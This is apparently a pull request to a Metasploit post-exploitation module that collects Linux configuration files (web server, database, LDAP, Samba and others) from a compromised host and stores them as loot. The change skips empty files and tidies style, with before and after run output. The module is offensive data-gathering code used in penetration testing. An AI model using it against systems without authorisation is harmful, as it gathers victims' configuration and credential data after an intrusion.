### PR TITLE
Prevent storing empty config files as loot

### DIFF
--- a/modules/post/linux/gather/enum_configs.rb
+++ b/modules/post/linux/gather/enum_configs.rb
@@ -6,7 +6,7 @@
 class MetasploitModule < Msf::Post
   include Msf::Post::Linux::System
 
-  def initialize(info={})
+  def initialize(info = {})
     super( update_info( info,
       'Name'          => 'Linux Gather Configurations',
       'Description'   => %q{
@@ -27,36 +27,25 @@ class MetasploitModule < Msf::Post
 
   def run
     distro = get_sysinfo
-    h = get_host
-    print_status("Running module against #{h}")
-    print_status("Info:")
-    print_status("\t#{distro[:version]}")
-    print_status("\t#{distro[:kernel]}")
 
-    vprint_status("Finding configuration files...")
+    print_status "Running module against #{session.session_host} [#{get_hostname}]"
+    print_status 'Info:'
+    print_status "\t#{distro[:version]}"
+    print_status "\t#{distro[:kernel]}"
+
+    vprint_status 'Finding configuration files...'
     find_configs
   end
 
-  def save(file, data, ctype="text/plain")
-    ltype = "linux.enum.conf"
+  def save(file, data, ctype='text/plain')
+    ltype = 'linux.enum.conf'
     fname = ::File.basename(file)
     loot = store_loot(ltype, ctype, session, data, fname)
-    print_good("#{fname} stored in #{loot.to_s}")
-  end
-
-  def get_host
-    case session.type
-    when /meterpreter/
-      host = sysinfo["Computer"]
-    when /shell/
-      host = cmd_exec("hostname").chomp
-    end
-
-    return host
+    print_good("#{fname} stored in #{loot}")
   end
 
   def find_configs
-    configs =[
+    configs = [
       "/etc/apache2/apache2.conf", "/etc/apache2/ports.conf", "/etc/nginx/nginx.conf",
       "/etc/snort/snort.conf", "/etc/mysql/my.cnf", "/etc/ufw/ufw.conf",
       "/etc/ufw/sysctl.conf", "/etc/security.access.conf", "/etc/shells",
@@ -70,8 +59,10 @@ class MetasploitModule < Msf::Post
     ]
 
     configs.each do |f|
-      output = read_file("#{f}")
-      save(f,  output) if output && output !~ /No such file or directory/
+      output = read_file(f).to_s
+      next if output.strip.length == 0
+      next if output =~ /No such file or directory/
+      save(f, output)
     end
   end
 end


### PR DESCRIPTION
This PR prevents the `linux/gather/enum_configs` module from storing empty config files as loot.

Before this PR, this module would store every config file, regardless of whether it existed, and regardless of whether it was empty (ie, permission denied). This was mitigated in part by a regex for `/No such file or directory/`, which was largely useless, but I've left it in. This regex didn't always match, is locale-dependent, and ignores `/Permission denied/`.

In some instances, it may be useful to know that a config file existed, but was empty. However, this is rare, and the existing implementation also failed in this regard, due to the aforementioned shortcomings in the regex. For this reason, I argue that this PR is an improvement.

Worse, the loot is stored with the generic name `linux.enum.conf` which gives no indication of which file you're looking at, unless you still have the console open, or spooled console output to a log file for review, so you can play a dumb game of match-the-loot-filename-to-config-filename. This PR does not resolve this issue, as it still uses the `linux.enum.conf` naming convention, but mitigates it in part by not clogging up the loot directory with empty files.

This PR also includes some minor style changes.

### Before

```
msf5 post(linux/gather/enum_configs) > run

[!] SESSION may not be compatible with this module.
[*] Running module against subgraph
[*] Info:
[*] 	Subgraph OS 1.0  
[*] 	Linux subgraph 4.9.33-subgraph #1 SMP Mon Jun 19 20:32:42 UTC 2017 x86_64 GNU/Linux
[*] Finding configuration files...
[+] apache2.conf stored in /root/.msf4/loot/20181206073758_default_172.16.191.142_linux.enum.conf_441886.txt
[+] ports.conf stored in /root/.msf4/loot/20181206073758_default_172.16.191.142_linux.enum.conf_423480.txt
[+] nginx.conf stored in /root/.msf4/loot/20181206073758_default_172.16.191.142_linux.enum.conf_070280.txt
[+] snort.conf stored in /root/.msf4/loot/20181206073758_default_172.16.191.142_linux.enum.conf_768418.txt
[+] my.cnf stored in /root/.msf4/loot/20181206073758_default_172.16.191.142_linux.enum.conf_888947.txt
[+] ufw.conf stored in /root/.msf4/loot/20181206073758_default_172.16.191.142_linux.enum.conf_857432.txt
[+] sysctl.conf stored in /root/.msf4/loot/20181206073758_default_172.16.191.142_linux.enum.conf_719241.txt
[+] security.access.conf stored in /root/.msf4/loot/20181206073758_default_172.16.191.142_linux.enum.conf_143477.txt
[+] shells stored in /root/.msf4/loot/20181206073758_default_172.16.191.142_linux.enum.conf_293610.txt
[+] sepermit.conf stored in /root/.msf4/loot/20181206073758_default_172.16.191.142_linux.enum.conf_877445.txt
[+] ca-certificates.conf stored in /root/.msf4/loot/20181206073758_default_172.16.191.142_linux.enum.conf_031230.txt
[+] access.conf stored in /root/.msf4/loot/20181206073758_default_172.16.191.142_linux.enum.conf_800338.txt
[+] gated.conf stored in /root/.msf4/loot/20181206073758_default_172.16.191.142_linux.enum.conf_914133.txt
[+] rpc stored in /root/.msf4/loot/20181206073758_default_172.16.191.142_linux.enum.conf_165241.txt
[+] psad.conf stored in /root/.msf4/loot/20181206073758_default_172.16.191.142_linux.enum.conf_363847.txt
[+] debian.cnf stored in /root/.msf4/loot/20181206073759_default_172.16.191.142_linux.enum.conf_268450.txt
[+] chkrootkit.conf stored in /root/.msf4/loot/20181206073759_default_172.16.191.142_linux.enum.conf_721853.txt
[+] logrotate.conf stored in /root/.msf4/loot/20181206073759_default_172.16.191.142_linux.enum.conf_983003.txt
[+] rkhunter.conf stored in /root/.msf4/loot/20181206073759_default_172.16.191.142_linux.enum.conf_619298.txt
[+] smb.conf stored in /root/.msf4/loot/20181206073759_default_172.16.191.142_linux.enum.conf_468565.txt
[+] ldap.conf stored in /root/.msf4/loot/20181206073759_default_172.16.191.142_linux.enum.conf_715081.txt
[+] openldap.conf stored in /root/.msf4/loot/20181206073759_default_172.16.191.142_linux.enum.conf_583731.txt
[+] cups.conf stored in /root/.msf4/loot/20181206073759_default_172.16.191.142_linux.enum.conf_746181.txt
[+] httpd.conf stored in /root/.msf4/loot/20181206073759_default_172.16.191.142_linux.enum.conf_024369.txt
[+] sysctl.conf stored in /root/.msf4/loot/20181206073759_default_172.16.191.142_linux.enum.conf_030931.txt
[+] proxychains.conf stored in /root/.msf4/loot/20181206073759_default_172.16.191.142_linux.enum.conf_537195.txt
[+] snmp.conf stored in /root/.msf4/loot/20181206073759_default_172.16.191.142_linux.enum.conf_039472.txt
[+] sendmail.conf stored in /root/.msf4/loot/20181206073759_default_172.16.191.142_linux.enum.conf_195537.txt
[+] snmp.conf stored in /root/.msf4/loot/20181206073759_default_172.16.191.142_linux.enum.conf_151352.txt
[*] Post module execution completed
```

### After

```
msf5 post(linux/gather/enum_configs) > rexploit 
[*] Reloading module...

[!] SESSION may not be compatible with this module.
[*] Running module against 172.16.191.142 [subgraph]
[*] Info:
[*] 	Subgraph OS 1.0  
[*] 	Linux subgraph 4.9.33-subgraph #1 SMP Mon Jun 19 20:32:42 UTC 2017 x86_64 GNU/Linux
[*] Finding configuration files...
[+] shells stored in /root/.msf4/loot/20181206075253_default_172.16.191.142_linux.enum.conf_590038.txt
[+] sepermit.conf stored in /root/.msf4/loot/20181206075253_default_172.16.191.142_linux.enum.conf_609883.txt
[+] ca-certificates.conf stored in /root/.msf4/loot/20181206075253_default_172.16.191.142_linux.enum.conf_686067.txt
[+] access.conf stored in /root/.msf4/loot/20181206075253_default_172.16.191.142_linux.enum.conf_846060.txt
[+] rpc stored in /root/.msf4/loot/20181206075253_default_172.16.191.142_linux.enum.conf_449602.txt
[+] logrotate.conf stored in /root/.msf4/loot/20181206075254_default_172.16.191.142_linux.enum.conf_925699.txt
[+] ldap.conf stored in /root/.msf4/loot/20181206075254_default_172.16.191.142_linux.enum.conf_258899.txt
[+] sysctl.conf stored in /root/.msf4/loot/20181206075254_default_172.16.191.142_linux.enum.conf_684448.txt
[*] Post module execution completed
```
